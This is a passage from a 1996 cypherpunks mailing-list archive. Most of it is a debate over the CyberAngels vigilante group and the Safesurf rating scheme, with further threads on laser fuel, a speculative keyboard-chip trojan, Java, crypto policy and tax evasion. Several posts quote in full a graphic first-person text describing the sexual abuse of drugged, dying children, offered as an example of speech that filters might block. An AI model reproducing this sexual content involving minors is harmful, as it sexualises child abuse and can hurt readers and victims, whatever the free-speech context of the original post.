 and irritated. She had no idea what she'd done to provoke the 
 warning, and since the message was anonymous, there was no 
 way to _find out_ what she was supposed to have done. 
     By November, the Angels claimed they had 200 volunteers 
 working for them, busily searching for bad guys on the net. 
 "We have reported a number of Child Pornographers (50) to 
 Sysadmins [system administrators] this month," Colin Hatcher 
 noted, although he was no longer signing his real name to his 
 progress reports, perhaps in fear of reprisals from angry 
 pedophiles. "Letters we have received back all share our 
 concern and promise stern action. Remember, each electronic 
 image represents a real life destroyed." 

 [...]

     Some net users wondered, though, if Hatcher was 
 qualified to draw a dividing line between good and bad, let 
 alone ugly. They also worried that decency vigilantes might 
 have a chilling effect on freedom of speech. A student at 
 Rutgers University complained that some of the Angels' public 
 statements "are threats to violate the civil liberties of 
 users of the Internet." In addition, he said, "the record of 
 the Guardian Angels suggests that they will step over even 
 the bounds that they publicly set for themselves." 

And, as Steven Levy wrote in Newsweek last October: "After the issue of
child safety in cyberspace came up on his radio talk show, [Curtis]
Sliwa decided to pursue in his usual high-profile fashion... Though the
CyberAngels cannot document a single case where one of their numerous
reports led directly to an arrest, they have compiled a fat file of
press clippings."

In the attached piece, the Angels hold themselves up as the arbiter of
what is appropriate for kids or not under the Safesurf system. So far so
good -- but what criteria do they use when checking to see if a site is
"genuinely kidsafe?" Where is it documented and published? What training
do their self-selected vigilantes have? Will the fight-censorship list
be blocked when we have messages like this one on it:

 http://www.cs.cmu.edu/~declan/rimm/asst/anti_porn_group_11_22_94.letter
 --------------------------------------------------------------------------
 Those orphan kids in the terminally ill section of the hospital are so fun
 at night when they are drugged out. I love sucking on their tiny
 finger-sized cocks and probing their tight holes. Their slender little
 bodies are completely smooth. They're going to die pretty soon so they
 won't come back to me several years from now as hairy grown up men blaming
 me for why they are all mentally messed up. And since they are orphans
 with no one to look over them except for overworked staff, I could get
 away with just about anything.

Since blocking software like Safesurf and SurfWatch is central to our
case challenging the CDA, I believe we should support that software and
PICS-like third paty rating systems. Fortunately, that doesn't mean we
have to accept or support the efforts of their unfortunate and
intemperate net-vigilante allies.

But I still want to help rate some web pages, so ---- "Gabriel," I want
to be a CyberAngel. Sign me up!

-Declan (now a CyberSeraphim)


---------- Forwarded message ----------
Date: Thu, 25 Apr 1996 19:11:16 -0700
From: angels@wavenet.com
Subject: ALERT FOR 20 VOLUNTEERS!

APPEAL FOR VOLUNTEERS

Hi again everyone.  I have a project that requires 20 volunteers.  Read on!

Most of you I hope are familiar with Safesurf - if not go visit them at
http://www.safesurf.com

Safesurf are not a commercial software company but are a kidsafe
organization who are very involved in the ratings issue for kids and adult
material on the Net.  Safesurf are also our allies, and it is thanks to
them that we have our website at all as it was a donation from Ray and
Wendy at Safesurf.

Safesurf have a very positive approach to the screening debate - they have
developed a rating system whereby instead of spending time rating adult
sites you focus instead on rating the kids sites.  Then your screening
software only allows you to visit sites with the Safesurf rating on it.
This is an excellent concept, not least because it doesn't then matter if
new sites come onto the web that are not rated yet, because nothing can be
included in your screened browser unless it registers itself as kidsafe by
marking its site with a safesurf rating mark.  Don't worry about my
ramblings - just go to their site and read up on it.  It's a really
positive concept and has been adopted by a lot of sites already.  Adopting
the Safesurf mark is voluntary and means that you are identifying your site
as suitable for e.g. kids.

Now here comes the appeal.  Several thousand sites have already marked
themselves as Safesurf rated - and more are registering every day.

The question is - what is to stop a site registering as a kidsafe site, but
in reality being an adult site?  The Safesurf rating method is that sites
can obtain the rating from the Safesurf site and then write in and register
themselves.  Isn't it possible that a site could claim to be kidsafe but in
reality was adult?

The answer is yes.  So how can Safesurf be sure that sites registered with
them are indeed genuinely kidsafe?  Simple - someone has to go and check
out all the sites who register with Safesurf.

Ray had a proposal for me.  How about if we could say that all these sites
were "Rated by Safesurf, and patrolled by CyberAngels"?  I thought that was
a great idea - for we CyberAngels to help Safesurf in this way, by checking
their sites for them.

Ray is proposing to send me 200 sites a week to check out and we will share
them out to a CyberAngels team of 20 volunteers - that means that each one
of us would volunteer to check out 10 sites per week.  Easy right?

I want to make something very clear - Safesurf are not a rich commercial
company making money from rating sites.  They are not selling software and
their rating code is free to anyone who wants it.  So it's not like they
can hire 20 people and pay them to patrol the Safesurf Intranet - it's a
volunteer job.

So there you are - I am looking for 20 CyberAngel volunteers to make up a
regular Safesurf "Intranet" Patrol, with the mission to visit 10 URLs a
week and make sure that they are what they say they are.  Who's ready?

Once I have the team established I will then brief you all on how we do
this.  Write to me as soon as possible if this interests you.  Let's show
Safesurf how much we support their positive stand for our InterNet kids!  I
will take the first 20 volunteers who contact me (yes you will be suitably
honored - publicly if you so choose!)

Gabriel





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: angels@wavenet.com (CyberAngels Director : Colin Gabriel Hatcher)
Date: Fri, 26 Apr 1996 23:05:10 +0800
To: declan+@CMU.EDU
Subject: Re: Guardian angels, the decency brigade, and cyberseraphim
Message-ID: <v01510104a9e0b3478ea3@[198.147.118.152]>
MIME-Version: 1.0
Content-Type: text/plain


Thanks Declan for forwarding your letter to me.  I'll answer some of the
points you refer to:

>So much for anonymous remailers! But the CyberAngels, in a fit of almost
> painful hypocrisy, use anonymous remailers themselves, as Charles Platt
>recounts in his book _Anarchy Online_:

Some of our members use anon remailers (although strictly speaking they are
pseudo anon remailers and therefore the user can be traced).  These are
members who are also supporters of privacy and anonymity online.  I do
myself use an anon remailer.  There is nothing hypocritical about it at
all.  We are not proposing to ban anon remailers, we are simply concerned
about the abuse of them.

>
>      How would this decency crusade actually work in
> practice? Well, later in 1995, one net user received the
> following not-very-friendly, not-very-literate warning, sent
> via an anonymous remailer:
>
>          The Net is out of control, sex crimes, hate crimes
>     and felonies.
>          Just as on the streets, CyberCrime is committed by
>     a minority of criminals who destroy the quality of life
>     for an innocent majority. And just like on the streets
>     the Guardian Angels will combat it.
>          We have good reason to believe that you are
>     involved in unlawful, harmful, hateful, threatening
>     and/or harassment, particularly relating to minors. We
>     will be watching you.

This message was not from our organization at all.  Surely you have heard
of  impersonation?  The oldest trick in thebook.

>
>      The netizen who found this in her mailbox was baffled
> and irritated. She had no idea what she'd done to provoke the
> warning, and since the message was anonymous, there was no
> way to _find out_ what she was supposed to have done.

Just goes to show what happens when people abuse anon remailers, right?
But it was not me.


>     By November, the Angels claimed they had 200 volunteers
> working for them, busily searching for bad guys on the net.
> "We have reported a number of Child Pornographers (50) to
> Sysadmins [system administrators] this month," Colin Hatcher
> noted, although he was no longer signing his real name to his
> progress reports, perhaps in fear of reprisals from angry
> pedophiles.

LOL, Gabriel is my nickname!  I think the writer is thinking too hard about
conspiracies...


>And, as Steven Levy wrote in Newsweek last October: "After the issue of
>child safety in cyberspace came up on his radio talk show, [Curtis]
>Sliwa decided to pursue in his usual high-profile fashion... Though the
>CyberAngels cannot document a single case where one of their numerous
>reports led directly to an arrest, they have compiled a fat file of
>press clippings."

People also wish to evaluate the work of the Guardian Angels by asking how
many arrests we have made.  But this misses the point of the work entirely.
We do not patrol to make arrests.  We patrol to help others.  And a good
patrol means that nothing happens.

As for press, we didnt even send a press release until 4 months after we
started, and then only to announce our website.  And we've only sent one
more press release out since then.  We do believe however that we have
helped to bring the issue of children and the Internet to the forefront and
that is a good thing too.

>
>In the attached piece, the Angels hold themselves up as the arbiter of
>what is appropriate for kids or not under the Safesurf system.
>So far so
>good -- but what criteria do they use when checking to see if a site is
>"genuinely kidsafe?" Where is it documented and published? What training
>do their self-selected vigilantes have?

The Safesurf system is a voluntary rating system that URLs undertake
themselves.  If you want to know more about the criteria you should check
out Safesurf themselves at http://www.safesurf.com

>Will the fight-censorship list
>be blocked when we have messages like this one on it:
>
> http://www.cs.cmu.edu/~declan/rimm/asst/anti_porn_group_11_22_94.letter
> --------------------------------------------------------------------------
> Those orphan kids in the terminally ill section of the hospital are so fun
> at night when they are drugged out. I love sucking on their tiny
> finger-sized cocks and probing their tight holes. Their slender little
> bodies are completely smooth. They're going to die pretty soon so they
> won't come back to me several years from now as hairy grown up men blaming
> me for why they are all mentally messed up. And since they are orphans
> with no one to look over them except for overworked staff, I could get
> away with just about anything.

Why ask?  Clearly a site with a message like this would not be suitable for
children to read.  That would be an adult site rating.

>
>Since blocking software like Safesurf and SurfWatch is central to our
>case challenging the CDA...

Safesurf does not make software.  It's not a software manufacturer at all.

>Fortunately, that doesn't mean we
>have to accept or support the efforts of their unfortunate and
>intemperate net-vigilante allies.
>But I still want to help rate some web pages, so ---- "Gabriel," I want
>to be a CyberAngel. Sign me up!
>
>-Declan (now a CyberSeraphim)

Declan I'm sorry to be the bearer of bad news but since you clearly are
hostile to our mission I see no reason why we should invite you to help us.

Of course you could always sign up as an anonymous volunteer from an anon
remailer , or from another account, and pretend to believe in what we are
doing ;)

CyberAngels is about self-regulation.  Let us not confuse the fight against
internet crime with the criminalization of free speech.  We propose the
former not the latter.

Gabriel

*************************************************************************
"All that is required for the triumph of evil is that good men
and women remain silent and do nothing" (Edmund Burke)

"Congress shall make no law respecting an establishment
of religion or prohibiting the free exercise thereof; or
abridging the freedom of speech, or of the press; or the
right of the people peaceably to assemble and to petition
the Government for a redress of grievances."
(US First Amendment to the Constitution)

"Those who sacrifice security for freedom, will have neither"

**************************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter Monta <pmonta@qualcomm.com>
Date: Fri, 26 Apr 1996 23:01:32 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] What is "laser material"?
Message-ID: <199604260734.AAA05221@mage.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


> Does anyone have any idea what "more laser material" means?

Well, you see, the lasing species is set in an argon matrix
(yes, it's an excimer!); once the argon has evaporated, you
need another rod.

:-)

Peter Monta   pmonta@qualcomm.com
Qualcomm, Inc./Globalstar




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 26 Apr 1996 21:32:06 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] What is "laser material"?
Message-ID: <m0uCiBY-00094cC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:05 PM 4/25/96 -0700, Bill Frantz wrote:
>>   The Washington Post, April 25, 1996, p. A12.
>>
>>
>>   Israelis Eye U.S. Laser As Anti-Rocket Defense
>>
>>       'Nautilus' Beam Burns Surface of Weapon
>>
>>   By John Mintz
>>
>>...
>>   Moreover, a laser shot costs $3,000, compared to several
>>   million dollars for a missile. Army officials envision the
>>   Nautilus would be beamed from a truck capable of firing 50
>>   shots before requiring more laser material. 
>
>Does anyone have any idea what "more laser material" means?

Hydrogen and fluorine, possibly.  Some of the more energetic lasers use this 
combination.

Jim "He only talks about one thing" Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 26 Apr 1996 23:23:04 +0800
To: "Paul S. Penrod" <furballs@netcom.com>
Subject: Re: trusting the processor chip
Message-ID: <m0uCiBa-00094jC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:14 PM 4/25/96 -0700, Paul S. Penrod wrote:
>
>
>On Thu, 25 Apr 1996, jim bell wrote:
>?
>> 
>> This analysis seems to assume that the entire production run of a standard 
>> product is subverted.  More likely,I think, an organization like the NSA 
>> might build a pin-compatible version of an existing, commonly-used product 
>> like a keyboard encoder chip that is designed to transmit (by RFI signals) 
>> the contents of what is typed at the keyboard.  It's simple, it's hard to 
>> detect, and it gets what they want.
>> 
>> Jim Bell
>> jimbell@pacifier.com
>> 
>> 
>
>This is getting more rediculous by the minute. If NSA wanted to find out 
>what you were typing, they dont need to subvert microcode or chips on the 
>board. Unless you have a tempest device - all they have to do is pull RF 
>from your vicinty  and they can *see* just exactly what your typing.

You don't understand the subject, do you?  While it is possible to determine 
a great deal of information  from RF, there is an enormous difference in 
effort between analyzing the output of an uncooperative, inadvertent 
transmitter and a "cooperative" one.  The most commonly understood source of 
RF signals come from CRT's, called Van Eck radiation.  But passwords don't 
generally appear on CRT displays, so that is of limited value.  I don't 
doubt that standard keyboards produce RF that might be analyzed, their 
output is probably not particularly easy to detect against a background of 
processor RFI.  (It's short and low-amplitude)   Far easier to analyze would 
be a chip that loudly and longly transmitted the current typed keyboard 
character, perhaps in some sort of serial binary code, possibly by driving 
the keyboard scanning lines according to a pre-arranged pattern designed to 
emit RF at a particular rate based on the clock oscillator.  This 
transmission would be just about undetectable to anyone who didn't have a 
whole raft of sophisticated detection equipment.  However, to those who know 
what to look for, it would probably be relatively easy to see. 

One particularly important reason for using such a chip, which you entirely 
overlooked, is that many computers are at sites with more than one, and in 
some cases many more than one computer.  Their signals will mix, obviously, 
and will be very hard to separate.  If it is possible to replace a keyboard 
chip with a Trojan Horse, the one desired target will be far more identifiable.



Jim "He only talks about one thing" Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 26 Apr 1996 23:16:18 +0800
To: cypherpunks@toad.com
Subject: Re: The Joy of Java
Message-ID: <ada5c3312c021004e096@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:27 AM 4/26/96, Mike Duvos wrote:

>I completely agree with this.  Java incorporates the type of
>automatic corruption-proof memory management found in languages
>like APL, the basic notions of object oriented programming, fast
>dynamic linking, and a C-like program structure.
>
>This is powerful combination of features and gives Java the
>potential to do all the platform-independent things that were
>advertised for C before the rude reality of thousand line
>makefiles reared its ugly head. . The complete specification of
>the Java Virtual Machine means that the behavior of Java programs
>is perfectly well-defined, and one does not have to tweek
>anything which is processor or operating system dependent.

Let's hope that this is really true. Your point about C is an excellent
one, as certainly the "lingua franca" of C pretty much failed, except when
enough work was done to properly port an application.

(However, the bytecode/JVM approach exacts some performance penalty, albeit
partially ameliorated with JIT compilers that are likely to be widely
available. Some apps will just have to be tuned for speed. But when I look
at most crypto apps such as we are ultimately interested in--digital money,
mixes, crypto protocol building blocks, etc.--I see that first and foremost
they aren't getting done and distributed. The applet model looks pretty
good here.)

>In the future, I expect Java bytecode to become a significant
>channel for the distribution of popular applications, with
>compilation to fast native code on numerous platforms.

One interesting remark I read from someone was that the Java distribution
model returns us to an era of easier distribution of small programs. The
"application bloat" of very large programs may be at least partly fixed.
We'll see.

>Java is clean, and its concepts are easily understandable even by
>persons whose eyes glaze over after the first 30 pages of the C++
>manual.

My background in programming was in Lisp when I was with Intel (I started
Intel's AI lab and was the first person to look at neural nets for them),
and then Smalltalk for "fun." But, like I said recently, I knew that
Smalltalk had about zero chance of becoming widely used, despite fairly
impressive year-to-year growth rates. (I also got Lightspeed C in '86, but
barely played with it over the years...good intentions, though.)

Anyway, Mike is right that Java is a lot of fun. Enough good OO stuff to
keep Smalltalk folks happy, but with familiar C syntax. And going to
garbage collection/eliminating pointers is a major plus for reducing errors
and headaches.

A huge number of books are hitting the shelves. Besides the "Teach Yourself
Java in 21 Days" book, I really like "Core Java," a hefty tome with lots of
asides about how Java compares to C, C++, Lisp, and Smalltalk, and with
more of the "rationale" than most of the other books. The "Java in a
Nutshell" book is also well-regarded. And Peter van der Linden's "Just
Java" is good. (These are the four I have, and my eyes haven't been glazing
over yet.)

Gosling's book arrives soon. I looked at an advanced draft and it looks
excellent, too.

>Java Applets, mobile crypto agents, and the new Web-centric view
>of cyberspace will go a long way towards encouraging the
>planet-wide use of strong crypto, as well as effectively swatting
>annoying mosquitos like ITAR.
>
>Indeed, with Java, I can put up a Web page which teaches someone
>about a cryptographic algorithm, allows him to try it out and run
>sample data through it, and provides him with a
>platform-independent implementation of it to use as he wishes.
>All in one fell swoop.  That's a pretty powerful concept.
>
>Java has come at the right time, and it will produce chaotic
>change in the existing order.
>
>Should be interesting.

I agree with all of Mike's points.

Interestingly, I've been having an e-mail dialog with a friend who avers
that Java is just another temporary fad, just another ho-hum interpreted
language. He claims that Perl and TCL were similar fads, and didn't change
the world.

I disagree with him, of course. I think the flood of books, compilers,
incorporations into browsers and operating systems, etc. is strong evidence
that Java is a bit more than just this year's version of TCL.

But, the great thing about a market anarchy is that people get to vote. By
deciding what to buy, what to work on, what to build applications with, and
so forth.

The first "killer applet" (tm) will be what?

(There's a fair chance it could be a digital commerce applet, something to
exploit correctly the pent-up demand for online purchases....I can imagine
folks on this very list becoming the Scott Cook's of this market....)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Fri, 26 Apr 1996 20:53:26 +0800
To: cypherpunks@toad.com
Subject: Guardian angels, anonymity, and the decency brigade
Message-ID: <UlU6CG_00YUuEDpc4t@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Attached is a message from the CyberAngels asking for rating volunteers.

Jim Thomas published a fascinating and illuminating article documenting
the seamier side of these self-appointed net.vigilantes in the Computer
underground Digest earlier this year. (I vaguely remember some legal
threats soon afterwards.) Their authoritarian and anti-privacy leanings
are clear in their FAQ, at <http://www.safesurf.com/cyberangels/>:

  9) What kinds of changes would the Guardian Angels / CyberAngels like
  to see?

  a) We would like to see an improvement in User identification. User ID is
  impossible to verify or trace back. The very anonymity of Users is itself
  causing an increase in rudeness, sexual abuse, flaming, and crimes like
  pedophile activity. We the Net Users must take responsibility for the 
  problem ourselves. One of our demands is for more accountable User IDs
  on the Net. When people are anonymous they are also free to be criminals.
  In a riot you see rioters wearing masks to disguise their true identity.

So much for anonymous remailers! But the CyberAngels, in a fit of almost
painful hypocrisy, use anonymous remailers themselves, as Charles Platt
recounts in his book _Anarchy Online_ (their web page also says how
these virtues remain anonymous online):

      How would this decency crusade actually work in 
 practice? Well, later in 1995, one net user received the 
 following not-very-friendly, not-very-literate warning, sent 
 via an anonymous remailer: 

          The Net is out of control, sex crimes, hate crimes 
     and felonies. 
          Just as on the streets, CyberCrime is committed by 
     a minority of criminals who destroy the quality of life 
     for an innocent majority. And just like on the streets 
     the Guardian Angels will combat it. 
          We have good reason to believe that you are 
     involved in unlawful, harmful, hateful, threatening 
     and/or harassment, particularly relating to minors. We 
     will be watching you. 

      The netizen who found this in her mailbox was baffled 
 and irritated. She had no idea what she'd done to provoke the 
 warning, and since the message was anonymous, there was no 
 way to _find out_ what she was supposed to have done. 
     By November, the Angels claimed they had 200 volunteers 
 working for them, busily searching for bad guys on the net. 
 "We have reported a number of Child Pornographers (50) to 
 Sysadmins [system administrators] this month," Colin Hatcher 
 noted, although he was no longer signing his real name to his 
 progress reports, perhaps in fear of reprisals from angry 
 pedophiles. "Letters we have received back all share our 
 concern and promise stern action. Remember, each electronic 
 image represents a real life destroyed." 

 [...]

     Some net users wondered, though, if Hatcher was 
 qualified to draw a dividing line between good and bad, let 
 alone ugly. They also worried that decency vigilantes might 
 have a chilling effect on freedom of speech. A student at 
 Rutgers University complained that some of the Angels' public 
 statements "are threats to violate the civil liberties of 
 users of the Internet." In addition, he said, "the record of 
 the Guardian Angels suggests that they will step over even 
 the bounds that they publicly set for themselves." 

And, as Steven Levy wrote in Newsweek last October: "After the issue of
child safety in cyberspace came up on his radio talk show, [Curtis]
Sliwa decided to pursue in his usual high-profile fashion... Though the
CyberAngels cannot document a single case where one of their numerous
reports led directly to an arrest, they have compiled a fat file of
press clippings."

In the attached piece, the Angels hold themselves up as the arbiter of
what is appropriate for kids or not under the Safesurf system. So far so
good -- but what criteria do they use when checking to see if a site is
"genuinely kidsafe?" Where is it documented and published? What training
do their self-selected vigilantes have? Will the cypherpunks list
be blocked when we have messages like this one on it:

 http://www.cs.cmu.edu/~declan/rimm/asst/anti_porn_group_11_22_94.letter
 --------------------------------------------------------------------------
 Those orphan kids in the terminally ill section of the hospital are so fun
 at night when they are drugged out. I love sucking on their tiny
 finger-sized cocks and probing their tight holes. Their slender little
 bodies are completely smooth. They're going to die pretty soon so they
 won't come back to me several years from now as hairy grown up men blaming
 me for why they are all mentally messed up. And since they are orphans
 with no one to look over them except for overworked staff, I could get
 away with just about anything.

Since blocking software like Safesurf and SurfWatch is central to our
case challenging the CDA, I believe we should support that software and
PICS-like third paty rating systems. Fortunately, that doesn't mean we
have to accept or support the efforts of their unfortunate and
intemperate net-vigilante allies.

But I still want to help rate some web pages, so ---- "Gabriel," I want
to be a CyberAngel. Sign me up!

-Declan (now a CyberSeraphim)


---------- Forwarded message ----------
Date: Thu, 25 Apr 1996 19:11:16 -0700
From: angels@wavenet.com
Subject: ALERT FOR 20 VOLUNTEERS!

APPEAL FOR VOLUNTEERS

Hi again everyone.  I have a project that requires 20 volunteers.  Read on!

Most of you I hope are familiar with Safesurf - if not go visit them at
http://www.safesurf.com

Safesurf are not a commercial software company but are a kidsafe
organization who are very involved in the ratings issue for kids and adult
material on the Net.  Safesurf are also our allies, and it is thanks to
them that we have our website at all as it was a donation from Ray and
Wendy at Safesurf.

Safesurf have a very positive approach to the screening debate - they have
developed a rating system whereby instead of spending time rating adult
sites you focus instead on rating the kids sites.  Then your screening
software only allows you to visit sites with the Safesurf rating on it.
This is an excellent concept, not least because it doesn't then matter if
new sites come onto the web that are not rated yet, because nothing can be
included in your screened browser unless it registers itself as kidsafe by
marking its site with a safesurf rating mark.  Don't worry about my
ramblings - just go to their site and read up on it.  It's a really
positive concept and has been adopted by a lot of sites already.  Adopting
the Safesurf mark is voluntary and means that you are identifying your site
as suitable for e.g. kids.

Now here comes the appeal.  Several thousand sites have already marked
themselves as Safesurf rated - and more are registering every day.

The question is - what is to stop a site registering as a kidsafe site, but
in reality being an adult site?  The Safesurf rating method is that sites
can obtain the rating from the Safesurf site and then write in and register
themselves.  Isn't it possible that a site could claim to be kidsafe but in
reality was adult?

The answer is yes.  So how can Safesurf be sure that sites registered with
them are indeed genuinely kidsafe?  Simple - someone has to go and check
out all the sites who register with Safesurf.

Ray had a proposal for me.  How about if we could say that all these sites
were "Rated by Safesurf, and patrolled by CyberAngels"?  I thought that was
a great idea - for we CyberAngels to help Safesurf in this way, by checking
their sites for them.

Ray is proposing to send me 200 sites a week to check out and we will share
them out to a CyberAngels team of 20 volunteers - that means that each one
of us would volunteer to check out 10 sites per week.  Easy right?

I want to make something very clear - Safesurf are not a rich commercial
company making money from rating sites.  They are not selling software and
their rating code is free to anyone who wants it.  So it's not like they
can hire 20 people and pay them to patrol the Safesurf Intranet - it's a
volunteer job.

So there you are - I am looking for 20 CyberAngel volunteers to make up a
regular Safesurf "Intranet" Patrol, with the mission to visit 10 URLs a
week and make sure that they are what they say they are.  Who's ready?

Once I have the team established I will then brief you all on how we do
this.  Write to me as soon as possible if this interests you.  Let's show
Safesurf how much we support their positive stand for our InterNet kids!  I
will take the first 20 volunteers who contact me (yes you will be suitably
honored - publicly if you so choose!)

Gabriel








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Fri, 26 Apr 1996 22:13:24 +0800
To: cypherpunks@toad.com
Subject: Re: US law - World Law - Secret Banking
In-Reply-To: <199604252321.QAA17568@jobe.shell.portal.com>
Message-ID: <199604260650.BAA11550@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


>    In the United States and Europe, encryption policy is formed by a mix
>    of interests. Advocates of business, national security agencies, and
>    more recently the police -- all play a large role in the policy
>    debate.

Someone's conspicuously absent here:  us. 

The interests of citizens aren't taken into account, and the notion that
civil liberties are relevant to the crypto debate is alien to NSA
thinking. 

This is why the "golden key" campaign is important.  Right now, in the 
short term, the interests of big business and our interests as citizens 
coincide.  They have an acknowledged seat at the table, while we do not.

This is not to say that we aren't playing a role -- a big role -- in the
policy debate, despite what the NSA lawyer said.  We (well, actually some
of you) are demonstrating to corporate customers that they need strong
crypto.  Business is listening to us, and the government is listening to
business. 

Nobody is paying any attention at all to the blue ribbons, though.

As long as companies like Netscape continue to support open standards, 
we'll come out ahead if they pursue their own narrow interests.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 26 Apr 1996 23:37:26 +0800
To: cypherpunks@toad.com
Subject: Is the public involved in the crypto policy debate?
Message-ID: <ada5d55c30021004254b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:50 AM 4/26/96, Alex Strasheim wrote:
>>    In the United States and Europe, encryption policy is formed by a mix
>>    of interests. Advocates of business, national security agencies, and
>>    more recently the police -- all play a large role in the policy
>>    debate.
>
>Someone's conspicuously absent here:  us.

To be fair to Jim Bell, he made the same point a day or so ago.

I don't necessarily sift Stewart Baker's words for hermeneutical signs of
what the government is planning. He might just as well have included
"public opinion" in his list, and nothing would change.

And I'm quite sure that Baker, Denning, Nelson, et. al. are acutely aware
of the role of the "public" in these matters. The "public" as made manifest
in newspaper articles critical of Clipper, in "Wired" features against key
escrow and in favor of Cypherpunks-type themes, and so on.

While the "vocal minority" that rails against Administration policy in
sci.crypt, talk.politics.crypto, comp.org.eff.talk, this list, etc., are
not the public at large, we are certainly a part of the public.

I think the rejection of Clipper by "the public" is proof of this.

(If we were leftist theoreticians, we could debate for years or even
decades whether our movement is truly a mass movement, or just a vanguard
movement, etc.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 27 Apr 1996 00:43:52 +0800
To: cypherpunks@toad.com
Subject: Re: US law - World Law - Secret Banking
In-Reply-To: <UlU8SES00iWV80j2lz@andrew.cmu.edu>
Message-ID: <Pine.GUL.3.93.960426013529.940H-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 26 Apr 1996, Michael Loomis wrote:

>     I have been reading this list to get an idea where Declan gets some
> of his lunatic ideas and what Rich Graves says when he is not up to
> Holocaust fetishism.  Despite Timothy's claim to the contrary, it seems
> that the basic point of this list is some libertarian notion that tax
> evasion is a good thing.

That might be one view, but not mine. I think people who evade income
taxes are bad -- they're stealing from the rest of society. But I believe
that the growth of cryptoanarchy means that people who make far more money
than we do can evade taxes with ever greater ease. The current system puts
honest people at a disadvantage, which is never a good thing. The
technical and economic analyses presented here are neither good or bad --
they're true or false. I tend to believe that they are more true than
false. 

My semi-conclusion is that in a knowledge and services society like ours,
a fair share of income tax cannot be collected from the very rich without
imposing totalitarian controls; therefore, government needs to be more
entrepreneurial, cut costs, divide labor, and raise revenue through
somewhate harder-to-evade sales, real estate, and inheritance taxes. Such
a system would probably be more regressive in theory, but not too
different in practice -- and it would be honest. 

Globalization and network-based freedom further weaken the sovereign,
geographically defined, vertically integrated nation-state. I don't
necessarily see this as a bad thing. I agree with the crypto-anarchist
analysis that the status quo is untenable, but I haven't made up my mind
where we should go.

My academic background is in Latin America. I've known a lot of
governments that really suck, and a lot of revolutions that are even
worse.

> While I am not clear how serious of threat, if
> one at all, to a system of fair taxiation, since much of the talk could
> be simply bluff, I have been made glad for the first time for the War on
> Drugs.  This silly war--tragic in terms of its economic cost and its
> assault on liberty--at least has forces some government agencies to take
> you seriously enough to figure out how to derail your plans of tax
> evasion.

In what way has the War on Drugs derailed tax evasion? Please elaborate. 
On the contrary, I think it has demonstrated the ineffectiveness of
attempts to control tax evasion and smuggling. 

Thank you for providing this rare insight into how you think. I haven't
heard from you in three months; I was starting to wonder. Please drop by
and have a beer some time.

- -rich
 FUCKING STATIST and HOLOCAUST FETISHIST
 http://www.c2.org/~rich/Not_By_Me_Not_My_Views/rebuttal.html

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMYCTRI3DXUbM57SdAQHLDQQAjg/jsvqt+xAfmXAysAQ/E8519SC57/Tk
x46GoHv3ExVQcJNFu2MrePa8OygMzQZ5Iw0OFUhv9XRLJ05ClVUbyff6X5Y2oVyl
ZlLb84NrGgl23Ksfi8QkRdlvGgEEEwfB0VFei9mte82HBQvULELM6KmNiBQIgW/R
XG7xbWrneKI=
=teBf
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer@c2.org
Date: Sat, 27 Apr 1996 00:12:08 +0800
To: ml3e+@andrew.cmu.edu (Michael Loomis)
Subject: Re: US law - World Law - Secret Banking
In-Reply-To: <UlU8SES00iWV80j2lz@andrew.cmu.edu>
Message-ID: <199604260933.CAA28293@clotho.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> one at all, to a system of fair taxiation, since much of the talk could

	fair taxation. What a concept. Now why did this person appear
in my "cypherpunks-people-to-read-file?" I should go figure this out
and fix it.

> be simply bluff, I have been made glad for the first time for the War on
> Drugs.  This silly war--tragic in terms of its economic cost and its
> assault on liberty--at least has forces some government agencies to take
> you seriously enough to figure out how to derail your plans of tax
> evasion.
> 
> Michael Loomis
> 


-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion, Inc.			FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
